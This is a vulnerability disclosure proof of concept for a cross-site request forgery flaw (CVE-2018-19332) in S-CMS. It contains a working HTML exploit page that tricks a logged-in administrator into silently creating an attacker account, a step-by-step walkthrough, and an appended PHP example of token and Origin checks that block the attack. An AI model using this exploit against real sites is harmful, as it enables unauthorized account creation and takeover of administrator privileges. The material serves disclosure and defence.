
The POC of S-CMS(CSRF)-CVE-2018-19332

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip


CSRF Exp:
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<center><h1>fake request</h1></center>
<div>
    <!-- The form posts to the admin member-add endpoint. The browser attaches the
         logged-in administrator's session cookie, and the endpoint checks no
         CSRF token, so the cross-site submission is accepted as the admin. -->
    <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
    <input type="hidden" name="M_login" value="hacker">
    <input type="hidden" name="M_pwd" value="hacker">
    <input type="hidden" name="M_money" value="10000">
    <input type="hidden" name="M_fen" value="0">
    <input type="hidden" name="M_name" value="1">
    <input type="hidden" name="M_email" value="g@gmail.com">
    <input type="hidden" name="M_qq" value="132">
    <input type="hidden" name="M_add" value="x">
    <input type="hidden" name="M_mobile" value="11111111111">
    <input type="hidden" name="M_code" value="xxxx">

    <input type="submit" value="View my pic">

    </form>
</div>
</body>
</html>




PoC walkthrough:

1. Before the administrator clicks the link, there are four users.
   [screenshot: four users (before)]

2. The fake page shown above is served from a site the attacker controls.
   [screenshot: the fake page]

3. While logged in to the S-CMS admin panel, the administrator opens the fake page and clicks the button; the browser sends the member-add request with the admin's session cookie.
   [screenshot: the add-user request]

4. A new user is created by that request.
   [screenshot: five users exist (after)]
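As an added example that is not part of this post or of S-CMS, here is how the admin action could reject such a forged form: a per-session synchronizer token that the legitimate admin form carries and the handler verifies, plus an Origin/Referer host check. The function and field names (csrf_token, csrf_field, csrf_verify, _csrf) and the allowed-host value are assumptions for illustration.

```php
<?php
// Added example (not S-CMS code): synchronizer-token CSRF protection for an
// admin write action such as admin/ajax.php?type=member&action=add.
session_start();

// Issue one random token per session; the legitimate admin form embeds it.
function csrf_token(): string {
    if (empty($_SESSION['_csrf'])) {
        $_SESSION['_csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['_csrf'];
}

// Hidden field for the admin's own form. A page on another origin (like the
// "fake request" form above) cannot read this value, so it cannot forge it.
function csrf_field(): string {
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Returns true only for a POST whose token matches the session copy and whose
// Origin (or Referer) host is the site itself.
function csrf_verify(array $post, array $server, string $allowedHost): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $_SESSION['_csrf'] ?? '';
    $sent = (string)($post['_csrf'] ?? '');
    // hash_equals() compares in constant time; an empty session token never matches.
    if ($expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    // Defence in depth: browsers attach Origin (or Referer) to cross-site POSTs,
    // and for the forged form it names the attacker's host, not ours.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

// In the member-add handler, before any database write.
// Use the site's real hostname here rather than the request's Host header.
$allowedHost = 'cms.example.test'; // placeholder, assumption for illustration
if (!csrf_verify($_POST, $_SERVER, $allowedHost)) {
    http_response_code(403);
    exit('CSRF check failed');
}
// ... proceed with the member insert here.
```

With this in place the forged form from the post is refused with 403 because it carries no _csrf value and its Origin is the attacker's site, while the admin's own form, rendered with csrf_field(), still works.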
